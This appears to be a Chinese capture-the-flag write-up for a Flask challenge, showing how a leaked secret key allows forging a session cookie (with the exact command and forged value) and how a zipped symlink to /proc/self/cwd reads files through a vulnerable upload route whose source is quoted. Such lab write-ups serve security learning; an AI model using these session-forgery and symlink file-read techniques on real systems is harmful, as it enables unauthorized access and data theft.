知识点:利用 404 页面获取密钥,利用 ln -s 建立软连接,利用 proc 文件系统。
flask-session 伪造
测试发现 upload 页面需要权限,那么首先查看 cookie,发现格式很像 jwt 或者 flask-session。
利用 p 神的 flask-session 解密脚本。
尝试修改 id 为 1 登录,但要修改还需要 key,这边我找了半天没找到,看了 大佬们的 wp,学到了一种新姿势,利用 404 页面,获取key 。
最后利用加密脚本加密一下。
payload:
python .\flask_session3.py encode -s 'keyqqqwwweee!@#$%^&*' -t "{'id': b'1', 'is_login': True, 'password': 'admin', 'username': 'admin'}"
.eJyrVspMUbKqVlJIUrJS8g20tVWq1VHKLI7PyU_PzFOyKikqTdVRKkgsLi7PLwIqVEpMyQWK6yiVFqcW5SXmpsKFagFiyxgX.Y2xeVw.2vWtNNN_VVZwcUAcM-XcoL8v884
软连接获取 flag
在网页源码中给出了 flask 的一部分源码。
@app.route('/upload',methods=['GET','POST'])
def upload():
if session['id'] != b'1':
return render_template_string(temp)
if request.method=='POST':
m = hashlib.md5()
name = session['password']
name = name+'qweqweqwe'
name = name.encode(encoding='utf-8')
m.update(name)
md5_one= m.hexdigest()
n = hashlib.md5()
ip = request.remote_addr
ip = ip.encode(encoding='utf-8')
n.update(ip)
md5_ip = n.hexdigest()
f=request.files['file']
basepath=os.path.dirname(os.path.realpath(__file__))
path = basepath+'/upload/'+md5_ip+'/'+md5_one+'/'+session['username']+"/"
path_base = basepath+'/upload/'+md5_ip+'/'
filename = f.filename
pathname = path+filename
if "zip" != filename.split('.')[-1]:
return 'zip only allowed'
if not os.path.exists(path_base):
try:
os.makedirs(path_base)
except Exception as e:
return 'error'
if not os.path.exists(path):
try:
os.makedirs(path)
except Exception as e:
return 'error'
if not os.path.exists(pathname):
try:
f.save(pathname)
except Exception as e:
return 'error'
try:
cmd = "unzip -n -d "+path+" "+ pathname
if cmd.find('|') != -1 or cmd.find(';') != -1:
waf()
return 'error'
os.system(cmd)
except Exception as e:
return 'error'
unzip_file = zipfile.ZipFile(pathname,'r')
unzip_filename = unzip_file.namelist()[0]
if session['is_login'] != True:
return 'not login'
try:
if unzip_filename.find('/') != -1:
shutil.rmtree(path_base)
os.mkdir(path_base)
return 'error'
image = open(path+unzip_filename, "rb").read()
resp = make_response(image)
resp.headers['Content-Type'] = 'image/png'
return resp
except Exception as e:
shutil.rmtree(path_base)
os.mkdir(path_base)
return 'error'
return render_template('upload.html')
@app.route('/showflag')
def showflag():
if True == False:
image = open(os.path.join('./flag/flag.jpg'), "rb").read()
resp = make_response(image)
resp.headers['Content-Type'] = 'image/png'
return resp
else:
return "can't give you"
/showflag 路由中可以看出 flag 在 /flag/flag.jpg 中,但是绝对路径不知道,可以通过 /proc/self/cwd/flag/flag,jpg 软连接读取。
/upload 路由检测上传的文件是不是 zip 后缀的文件,如果是则解压,并且读取里面的文件内容并且返回到 upload.html。
这边又学到一个姿势:
利用 ln -s /proc/self/cwd/flag/flag.jpg succ 建立一个软连接到 succ,也就是创建了一个快捷键,名字叫 succ。
然后利用 zip -ry succ.zip succ 打包这个软连接
-r:将指定的目录下的所有子目录以及文件一起处理
-y:直接保存符号连接,而非该连接所指向的文件,本参数仅在UNIX之类的系统下有效。
最后抓包上传就可以拿到 flag 了。
reference
https://blog.youkuaiyun.com/SopRomeo/article/details/108334393
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
